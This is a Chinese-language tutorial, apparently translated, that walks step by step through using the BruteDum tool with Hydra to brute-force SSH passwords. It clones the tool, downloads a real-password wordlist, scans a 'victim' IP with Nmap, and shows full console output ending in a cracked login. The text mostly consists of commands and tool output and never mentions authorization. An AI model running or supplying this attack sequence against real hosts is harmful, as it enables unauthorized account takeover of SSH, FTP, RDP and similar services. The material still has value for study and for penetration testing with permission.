需要在系统上安装Python3。另外,我建议使用Kali Linux,因为它默认情况下应该安装了大多数必需的程序。如果要在另一个系统上执行此操作,则需要确保已安装所有必备程序。
如果您未使用Kali Linux,则可以使用Ubuntu或Debian,但需要确保已安装Hydra,Medusa和Ncrack。您还需要Nmap进行扫描。
我们还需要一个密码列表进行测试,在这种情况下,我们将其下载到稍后创建的文件夹中。如果您有喜欢的密码列表,则需要将其复制到我们要创建的文件夹中。
首先,我们需要从GitHub下载存储库。在新的终端窗口中,您可以键入以下命令来克隆存储库。
~$ git clone https://github.com/GitHackTools/BruteDum
Cloning into 'BruteDum'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (15/15), done.
~$ cd BruteDum
在此文件夹中,您将能够运行BruteDum。在我们这样做之前,我们应该照顾一个小怪癖。我发现BruteDum无法找到保存在BruteDum文件夹外部的密码列表,因此解决方案似乎是直接在此处添加我们的密码列表。为此,我将简单地从GitHub上删除一个,然后使用wget命令将其下载到我所在的文件夹中。
~/BruteDum$ wget https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt
--2020-01-10 17:19:59-- https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1620 (1.6K) [text/plain]
Saving to: ‘Top207-probable-v2.txt’
Top207-probable-v2. 100%[===================>] 1.58K --.-KB/s in 0s
2020-01-10 17:19:59 (53.3 MB/s) - ‘Top207-probable-v2.txt’ saved [1620/1620]
~/BruteDum$ python3 brutedum.py
888888 888888 BRUTE
8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE
8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST
88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR
88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE
88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES
[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
Author: https://GitHackTools.blogspot.com
[?] Enter the victim address:
加载屏幕完成后,我们需要输入受害者的IP地址。完成此操作后,按Enter,将为您提供运行Nmap扫描的选项。
[?] Enter the victim address: 192.168.43.1
[?] Do you want to scan victim's ports with Nmap? [Y/n]: Y
结果返回时,您应该能够将返回的所有端口标识为“开放”。接下来,您需要选择要破解的服务。这样做的菜单很容易理解,您可以选择与我们的Nmap扫描发现的服务匹配的菜单。
[+] Scanning ports with Nmap...
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-10 02:57 PDT
Nmap scan report for 192.168.43.1
Host is up (0.0087s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: ███.███.███.███.███.███
Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds
[1] FTP [2] Telnet
(Default port is 21) (Default port is 23)
[3] PostgreSQL [4] SSH
(Default port is 5432) (Default port is 22)
[5] RDP [6] VNC
(Default port is 3389) (Default port is 5900)
[?] Which protocol do you want to crack? [1-6]: 4
在我们的示例中,我们将选择选项4,然后按Enter键以表明我们要进行SSH破解。
现在,我们需要确定用于破解密码的工具。根据我们选择的服务,BruteDum将推荐一种服务。
888888 888888 BRUTE
8 8 eeeee e e eeeee eeee 8 8 e e eeeeeee FORCE
8eeee8ee 8 8 8 8 8 8 8e 8 8 8 8 8 8 JUST
88 8 8eee8e 8e 8 8e 8eee 88 8 8e 8 8e 8 8 FOR
88 8 88 8 88 8 88 88 88 8 88 8 88 8 8 THE
88eeeee8 88 8 88ee8 88 88ee 88eee8 88ee8 88 8 8 DUMMIES
[i] BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack
Author: https://GitHackTools.blogspot.com
[i] Target: 192.168.43.1
Protocol: ssh
[1] Ncrack
[2] Hydra (Recommended)
[3] Medusa
[?] Which tool do you want to use? [1-3]: 2
我们选择Hydra,因为它是破解SSH的推荐工具。键入2以指示Hydra(或您要使用的工具编号),然后按Enter开始对其进行配置
要发起攻击,我们需要进行时间与概率的权衡。我们的第一个选择是选择一个用户名列表。这意味着我们将尝试使用用户名列表中的每个用户名尝试密码列表中的每个密码。
在我们的示例中,我们可以选择N以拒绝使用用户名列表。取而代之的是,我们将使用一个通用的用户名,或者默认情况下,设备类型上可能存在的用户名。
[i] Target: 192.168.43.1
Protocol: ssh
[?] Do you want to use username list? [Y/n]: N
[?] Enter the username: toor
接下来,我们需要设置密码列表。如果我们在所在目录之外选择密码列表,将无法正常工作,因此我们现在可以添加之前下载的密码列表。如果您之前曾听过,那么我们应该能够在此处粘贴Top207-probable-v2.txt单词列表。
[?] Enter the path of wordlist: Top207-probable-v2.txt
最后,我们可以决定是否要使用默认端口。某些设备可能在标准端口以外的端口上托管服务,但这不是很常见。对于SSH,默认端口为22,因此我们只需输入Y并按Enter即可。
[?] Do you want to use default port? [Y/n]: Y
提供端口后,BruteDum将启动您指定的工具。
[i] Target: 192.168.43.1
Protocol: ssh
[+] Hydra is cracking...
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-10 09:23:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 208 login tries (l:1/p:208), ~13 tries per task
[DATA] attacking ssh://192.168.43.1:22/
[22][ssh] host: 192.168.43.1 login: toor password: root
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-10 10:51:18
[?] Do you want to conitnue? [Y/n]: N
经过一段时间的攻击网络并尝试所有密码后,您将得到结果,要么显示密码,要么报告未找到有效密码。